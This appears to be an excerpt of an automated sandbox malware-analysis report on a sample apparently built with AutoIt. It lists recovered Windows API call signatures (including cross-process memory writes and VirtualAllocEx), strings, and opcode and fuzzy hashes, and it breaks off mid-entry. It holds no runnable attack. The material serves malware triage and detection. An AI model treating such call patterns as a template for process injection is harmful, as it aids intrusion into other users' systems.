                                                            • Opcode ID: ffc1156bfff9dc7c50cef5bf29c2443a732ef869cb58f93ecbe80ec8d1d44d18
                                                            • Instruction ID: 2928097c11b3032855c3f238e1d37f8102f0ab1282e51372af439511e6d86a57
                                                            • Opcode Fuzzy Hash: ffc1156bfff9dc7c50cef5bf29c2443a732ef869cb58f93ecbe80ec8d1d44d18
                                                            • Instruction Fuzzy Hash: DA016D71201348BFDB204FAADC48DAB7BADEF8A754B508569F90DC3260DA318D00DAA0
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?,?,006E7455), ref: 006E7127
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E7142
                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E7150
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?), ref: 006E7160
                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006E7044,80070057,?,?), ref: 006E716C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                            • String ID:
                                                            • API String ID: 3897988419-0
                                                            • Opcode ID: 30181561ffd2dafda6b988f9c4595291de12f0ba29a4519f34e7f6e157125a96
                                                            • Instruction ID: 069ca48e6bdd0da0ebd80abb82ff90d7b8a79ed13f357fba77e46c1ef9458b99
                                                            • Opcode Fuzzy Hash: 30181561ffd2dafda6b988f9c4595291de12f0ba29a4519f34e7f6e157125a96
                                                            • Instruction Fuzzy Hash: 7B018F76612304BBDB118F69DC44BEA7BAEEF45791F188064FD08D3260E735DD419BA0
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F5260
                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006F526E
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F5276
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006F5280
                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F52BC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                            • String ID:
                                                            • API String ID: 2833360925-0
                                                            • Opcode ID: 129940652b9d850a88f451aba6a68e42befdbf057b405968b3e7d379676dab01
                                                            • Instruction ID: 5d6d4daf0d7d81cd707096d3dec822048b5c8160c863680dce32c6abe9acba6a
                                                            • Opcode Fuzzy Hash: 129940652b9d850a88f451aba6a68e42befdbf057b405968b3e7d379676dab01
                                                            • Instruction Fuzzy Hash: 06012131D01A1DEBCF00EFE8D8495FDBB79FB0D711F418255D646B2281CB345A5097A5
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E8121
                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E812B
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E813A
                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8141
                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E8157
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 1815d7d2d36fa9f89cb3d04e3d26aa7868fca0f39210839ba56e7f91eb6a52f6
                                                            • Instruction ID: e34d73919b83dbed38e84c8a9c00c9e7768fa19abda9f72a4ca54a8966435b29
                                                            • Opcode Fuzzy Hash: 1815d7d2d36fa9f89cb3d04e3d26aa7868fca0f39210839ba56e7f91eb6a52f6
                                                            • Instruction Fuzzy Hash: 67F0C270211305BFEB110FA9EC88EE73BADFF49754B008025F949C3290CB649D01EA60
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 006EC1F7
                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 006EC20E
                                                            • MessageBeep.USER32(00000000), ref: 006EC226
                                                            • KillTimer.USER32(?,0000040A), ref: 006EC242
                                                            • EndDialog.USER32(?,00000001), ref: 006EC25C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                            • String ID:
                                                            • API String ID: 3741023627-0
                                                            • Opcode ID: eea5710c76a25a8a0586afbd2c41d49a4cfa654ef890691e4706fb283dc2e9e6
                                                            • Instruction ID: d26c7a333f2fc5a14e1b94cb56b820997dc2693bbb5485adb80fe2a94968b1a6
                                                            • Opcode Fuzzy Hash: eea5710c76a25a8a0586afbd2c41d49a4cfa654ef890691e4706fb283dc2e9e6
                                                            • Instruction Fuzzy Hash: A101D630514B04ABEB245B69ED4EFD677B9FF00B16F008269F642A14E0DBF46A458B94
                                                            APIs
                                                            • EndPath.GDI32(?), ref: 006913BF
                                                            • StrokeAndFillPath.GDI32(?,?,006CB888,00000000,?), ref: 006913DB
                                                            • SelectObject.GDI32(?,00000000), ref: 006913EE
                                                            • DeleteObject.GDI32 ref: 00691401
                                                            • StrokePath.GDI32(?), ref: 0069141C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                            • String ID:
                                                            • API String ID: 2625713937-0
                                                            • Opcode ID: 291acff922e29950927bd9431a2998ffd214c19441c3d69c94f1b9e8c6113a78
                                                            • Instruction ID: 12e0f20f96c7ae02464f22da3bbe3a5dcb828ff9f1e8d5d5b63a5d0c87b83f7b
                                                            • Opcode Fuzzy Hash: 291acff922e29950927bd9431a2998ffd214c19441c3d69c94f1b9e8c6113a78
                                                            • Instruction Fuzzy Hash: 87F01930000B49EBDF115F2AEC5C7E83BE9A725326F18C324E42A485F1C77999A5DF18
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 006FC432
                                                            • CoCreateInstance.OLE32(00722D6C,00000000,00000001,00722BDC,?), ref: 006FC44A
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                            • CoUninitialize.OLE32 ref: 006FC6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 2b26a9244d4757b093f11d45844ea0dafc8acc38ae6de3aeb615e714623d75c2
                                                            • Instruction ID: 9098daea968386b7153bf33a3113203d421a6e9a663c937d64351817f4f7f63e
                                                            • Opcode Fuzzy Hash: 2b26a9244d4757b093f11d45844ea0dafc8acc38ae6de3aeb615e714623d75c2
                                                            • Instruction Fuzzy Hash: 28A15BB1108205AFDB40EF64C881EAFB7EDEF85354F00491DF156871A2EB71EA09CB66
                                                            APIs
                                                              • Part of subcall function 006B0DB6: std::exception::exception.LIBCMT ref: 006B0DEC
                                                              • Part of subcall function 006B0DB6: __CxxThrowException@8.LIBCMT ref: 006B0E01
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                              • Part of subcall function 00697A51: _memmove.LIBCMT ref: 00697AAB
                                                            • __swprintf.LIBCMT ref: 006A2ECD
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 006A2D66
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 1943609520-557222456
                                                            • Opcode ID: 4d35a581ee937a6a5ece32783d517dae6cfa384cca677448694659aa61f824c2
                                                            • Instruction ID: 1f066a78372df5703184fb45f8b7a805c7d0b83365c986e3d3dc21c0e4216109
                                                            • Opcode Fuzzy Hash: 4d35a581ee937a6a5ece32783d517dae6cfa384cca677448694659aa61f824c2
                                                            • Instruction Fuzzy Hash: A7917C715182029FCB54FF28C895CAFB7AAEF96310F00491EF4469B2A1EB30ED45CB56
                                                            APIs
                                                              • Part of subcall function 00694750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00694743,?,?,006937AE,?), ref: 00694770
                                                            • CoInitialize.OLE32(00000000), ref: 006FB9BB
                                                            • CoCreateInstance.OLE32(00722D6C,00000000,00000001,00722BDC,?), ref: 006FB9D4
                                                            • CoUninitialize.OLE32 ref: 006FB9F1
                                                              • Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
                                                              • Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                            • String ID: .lnk
                                                            • API String ID: 2126378814-24824748
                                                            • Opcode ID: deb1d15a28ba2a67be687d7d06a4b58b60f269f6a36fda3420c149d10b42fdf5
                                                            • Instruction ID: 82ecb63bb3554d2891664820a949df073a919cbed0f2a643ff28871eb42f9182
                                                            • Opcode Fuzzy Hash: deb1d15a28ba2a67be687d7d06a4b58b60f269f6a36fda3420c149d10b42fdf5
                                                            • Instruction Fuzzy Hash: A6A134756042059FCB00DF28C885D6AB7EAFF89314F04899CF9999B3A1DB31ED46CB91
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 006EB4BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container$%r
                                                            • API String ID: 3565006973-1282070598
                                                            • Opcode ID: 84a4b142e25a67ce2acc2046ebb05d820e405d3cdb9d6ae3ed9084a770bb16ee
                                                            • Instruction ID: eceb78ae972e25dea6705c53e41a77154c8abf3f7627b82e0f00e4689d4df833
                                                            • Opcode Fuzzy Hash: 84a4b142e25a67ce2acc2046ebb05d820e405d3cdb9d6ae3ed9084a770bb16ee
                                                            • Instruction Fuzzy Hash: 529138B0601701AFDB54DF65C885AABBBEAFF48710F20956DE94ACB391DB70E841CB50
                                                            APIs
                                                            • __startOneArgErrorHandling.LIBCMT ref: 006B50AD
                                                              • Part of subcall function 006C00F0: __87except.LIBCMT ref: 006C012B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ErrorHandling__87except__start
                                                            • String ID: pow
                                                            • API String ID: 2905807303-2276729525
                                                            • Opcode ID: f1fa5ad4848123a1400c61b36bef296405c95ec1ce5ecd82dc1346df619ca532
                                                            • Instruction ID: ed8463161a211f0e49decefeb4d971958bc114ca3151fa0b1b0a2fe70d97dcae
                                                            • Opcode Fuzzy Hash: f1fa5ad4848123a1400c61b36bef296405c95ec1ce5ecd82dc1346df619ca532
                                                            • Instruction Fuzzy Hash: D9514BB1908601C6EB217728C9057FE6B97DB40710F24895DE4D7863A9EF388AC5978A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: 3cj$_j
                                                            • API String ID: 4104443479-2927472950
                                                            • Opcode ID: e330191add47d25d4a88bebfec2cb3540a93d5d6c74c51e4c326abc9ac466e3c
                                                            • Instruction ID: 74c550003d2e37b954a5436c50f980cd2350c76edf97b04b670458485721a4fd
                                                            • Opcode Fuzzy Hash: e330191add47d25d4a88bebfec2cb3540a93d5d6c74c51e4c326abc9ac466e3c
                                                            • Instruction Fuzzy Hash: C1518CB0D006099FDB64DF68D884AEEBBB2FF44304F14852AE85AD7350EB31E965CB51
                                                            APIs
                                                              • Part of subcall function 006F14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006E9296,?,?,00000034,00000800,?,00000034), ref: 006F14E6
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 006E983F
                                                              • Part of subcall function 006F1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006E92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006F14B1
                                                              • Part of subcall function 006F13DE: GetWindowThreadProcessId.USER32(?,?), ref: 006F1409
                                                              • Part of subcall function 006F13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,006E925A,00000034,?,?,00001004,00000000,00000000), ref: 006F1419
                                                              • Part of subcall function 006F13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,006E925A,00000034,?,?,00001004,00000000,00000000), ref: 006F142F
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006E98AC
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006E98F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 31d1c865f4ac99c9489c91dd68baca0baec61031aa4cb766dbc3406c15d14735
                                                            • Instruction ID: 41895c8824aca12a032ab98e32e40cc9093fdacb7e08d8bf7bc7bd524af6a883
                                                            • Opcode Fuzzy Hash: 31d1c865f4ac99c9489c91dd68baca0baec61031aa4cb766dbc3406c15d14735
                                                            • Instruction Fuzzy Hash: 3F41627690121CBFCB10DFA4CC45AEEBBB9EF46340F044059FA45B7191DA706E45CBA4
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0071F910,00000000,?,?,?,?), ref: 007179DF
                                                            • GetWindowLongW.USER32 ref: 007179FC
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00717A0C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 58cf7e7772f319d040e2662e75eec462b929fe5a21704f3e0f37fab586f015fb
                                                            • Instruction ID: d92f22206d3f24f668c669c06bbee4df048a3769cf73d2457d7376cd2d0979a6
                                                            • Opcode Fuzzy Hash: 58cf7e7772f319d040e2662e75eec462b929fe5a21704f3e0f37fab586f015fb
                                                            • Instruction Fuzzy Hash: 38318B71204606ABDF158E3CCC45BEA77A9EF09324F248729F875A22E0D739ED95CB50
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00717461
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00717475
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00717499
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: faf71e5a3806f861143c0739f2d90d5cf58a4573fe3ce3449680999e411260f3
                                                            • Instruction ID: e56d3ea0fc11066b64bce1de0b1bc1f1599b11a0b9ca6c685978cbf8ceed6c36
                                                            • Opcode Fuzzy Hash: faf71e5a3806f861143c0739f2d90d5cf58a4573fe3ce3449680999e411260f3
                                                            • Instruction Fuzzy Hash: 5F21A332500259ABDF15CF98CC46FEA3B7AEF48724F114114FE156B1D0DA79AC91DBA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00716D3B
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00716D4B
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00716D70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 9ab01e6cef254e0ec921a222e33069f7699c1a7d0cf846d86acb6f6e4e30d78d
                                                            • Instruction ID: b356b01838df5b0af3ec7341d9160bb6ece94b197f8c7c4c1ae3489b8b6878c6
                                                            • Opcode Fuzzy Hash: 9ab01e6cef254e0ec921a222e33069f7699c1a7d0cf846d86acb6f6e4e30d78d
                                                            • Instruction Fuzzy Hash: 1C21C232700118BFDF118F58DC45EEB3BBAEF89760F018128FA459B1E0C675AC9187A0
                                                            APIs
                                                            • __snwprintf.LIBCMT ref: 00703A66
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __snwprintf_memmove
                                                            • String ID: , $$AUTOITCALLVARIABLE%d$%r
